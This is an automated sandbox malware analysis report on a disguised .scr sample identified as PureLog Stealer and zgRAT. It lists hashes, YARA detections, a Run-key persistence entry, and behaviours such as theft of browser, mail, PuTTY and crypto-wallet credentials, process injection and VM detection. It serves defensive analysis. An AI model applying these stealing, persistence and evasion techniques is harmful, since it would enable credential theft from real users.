Edit tour

Windows Analysis Report
UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Overview

General Information

Sample name:	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Analysis ID:	1428798
MD5:	f99dc4d2e045ae0bbc169fff12a5c6d5
SHA1:	c3a4a89907201776e9ad38fc63573522e0d233f1
SHA256:	e4726c4cad6dd043e87289a51733a6627b2abf1ae88b70458c9674ef4669540c
Infos:

Detection

PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains potential unpacker

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

UGS - CRO REQ - KHIDUBAI (OPL-841724).scr (PID: 3224 cmdline: "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr" /S MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)

UGS - CRO REQ - KHIDUBAI (OPL-841724).scr (PID: 3372 cmdline: "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr" MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)

Kbojz.exe (PID: 3552 cmdline: "C:\Users\user\AppData\Roaming\Kbojz.exe" MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)

Kbojz.exe (PID: 3752 cmdline: "C:\Users\user\AppData\Roaming\Kbojz.exe" MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)

Kbojz.exe (PID: 3652 cmdline: "C:\Users\user\AppData\Roaming\Kbojz.exe" MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)

Kbojz.exe (PID: 3840 cmdline: "C:\Users\user\AppData\Roaming\Kbojz.exe" MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.419873303.0000000000640000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5b65e:$s1: file:/// 0x5b56c:$s2: {11111-22222-10009-11112} 0x5b5ee:$s3: {11111-22222-50001-00000} 0x57783:$s4: get_Module 0x57a69:$s5: Reverse 0x4f5a5:$s6: BlockCopy 0x4f57b:$s7: ReadByte 0x5b670:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.420766544.00000000022E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.359357988.0000000006010000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.356481377.00000000021F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.432614615.0000000004CF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.410066207.000000000392F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.410066207.0000000003351000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.472630617.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr PID: 3224	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr PID: 3372	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr PID: 3372	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Kbojz.exe PID: 3552	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Kbojz.exe PID: 3652	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Kbojz.exe PID: 3752	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Kbojz.exe PID: 3840	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Kbojz.exe PID: 3840	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.Kbojz.exe.37a86e0.5.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Kbojz.exe.37efeb0.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4cf0000.13.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.6010000.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Kbojz.exe.37a86e0.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5985e:$s1: file:/// 0x5976c:$s2: {11111-22222-10009-11112} 0x597ee:$s3: {11111-22222-50001-00000} 0x55983:$s4: get_Module 0x55c69:$s5: Reverse 0x4d7a5:$s6: BlockCopy 0x4d77b:$s7: ReadByte 0x59870:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5b65e:$s1: file:/// 0x5b56c:$s2: {11111-22222-10009-11112} 0x5b5ee:$s3: {11111-22222-50001-00000} 0x57783:$s4: get_Module 0x57a69:$s5: Reverse 0x4f5a5:$s6: BlockCopy 0x4f57b:$s7: ReadByte 0x5b670:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.640000.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xbb69e:$s1: file:/// 0xbb5ac:$s2: {11111-22222-10009-11112} 0xbb62e:$s3: {11111-22222-50001-00000} 0xb77c3:$s4: get_Module 0xb7aa9:$s5: Reverse 0xaf5e5:$s6: BlockCopy 0xaf5bb:$s7: ReadByte 0xbb6b0:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5985e:$s1: file:/// 0x5976c:$s2: {11111-22222-10009-11112} 0x597ee:$s3: {11111-22222-50001-00000} 0x55983:$s4: get_Module 0x55c69:$s5: Reverse 0x4d7a5:$s6: BlockCopy 0x4d77b:$s7: ReadByte 0x59870:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
5.2.Kbojz.exe.36451d0.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3acec70.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5b65e:$s1: file:/// 0x5b56c:$s2: {11111-22222-10009-11112} 0x5b5ee:$s3: {11111-22222-50001-00000} 0x57783:$s4: get_Module 0x57a69:$s5: Reverse 0x4f5a5:$s6: BlockCopy 0x4f57b:$s7: ReadByte 0x5b670:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5985e:$s1: file:/// 0x5976c:$s2: {11111-22222-10009-11112} 0x597ee:$s3: {11111-22222-50001-00000} 0x55983:$s4: get_Module 0x55c69:$s5: Reverse 0x4d7a5:$s6: BlockCopy 0x4d77b:$s7: ReadByte 0x59870:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.Kbojz.exe.35e5190.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9b67e:$s1: file:/// 0x9b58c:$s2: {11111-22222-10009-11112} 0x9b60e:$s3: {11111-22222-50001-00000} 0x977a3:$s4: get_Module 0x97a89:$s5: Reverse 0x8f5c5:$s6: BlockCopy 0x8f59b:$s7: ReadByte 0x9b690:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
5.2.Kbojz.exe.35e5190.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5b65e:$s1: file:/// 0x5b56c:$s2: {11111-22222-10009-11112} 0x5b5ee:$s3: {11111-22222-50001-00000} 0x57783:$s4: get_Module 0x57a69:$s5: Reverse 0x4f5a5:$s6: BlockCopy 0x4f57b:$s7: ReadByte 0x5b670:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
4.2.Kbojz.exe.3db62b8.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.Kbojz.exe.36051b0.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.Kbojz.exe.36451d0.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.Kbojz.exe.36051b0.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.Kbojz.exe.3db62b8.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Kbojz.exe.3351590.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Kbojz.exe.392fed0.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 43 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Kbojz.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, ProcessId: 3224, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Kbojz

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Kbojz.exe

Avira: detection malicious, Label: HEUR/AGEN.1304549

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Kbojz.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

ReversingLabs: Detection: 63%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Kbojz.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Joe Sandbox ML: detected

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.41.11:443 -> 192.168.2.22:49184 version: TLS 1.2

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: f2f5b5c0-4645-40a2-a057-694e3cbb601b<Module>costura.costura.dll.compressedcostura.dotnetzip.dll.compressedcostura.dotnetzip.pdb.compressedcostura.protobuf-net.dll.compressedDglpobuyba.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.000000000386F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: p costura.dotnetzip.pdb.compressedt- source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: p costura.dotnetzip.pdb.compressed source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.000000000386F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Dglpobuyba.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003830000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: p costura.dotnetzip.pdb.compressedlB source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
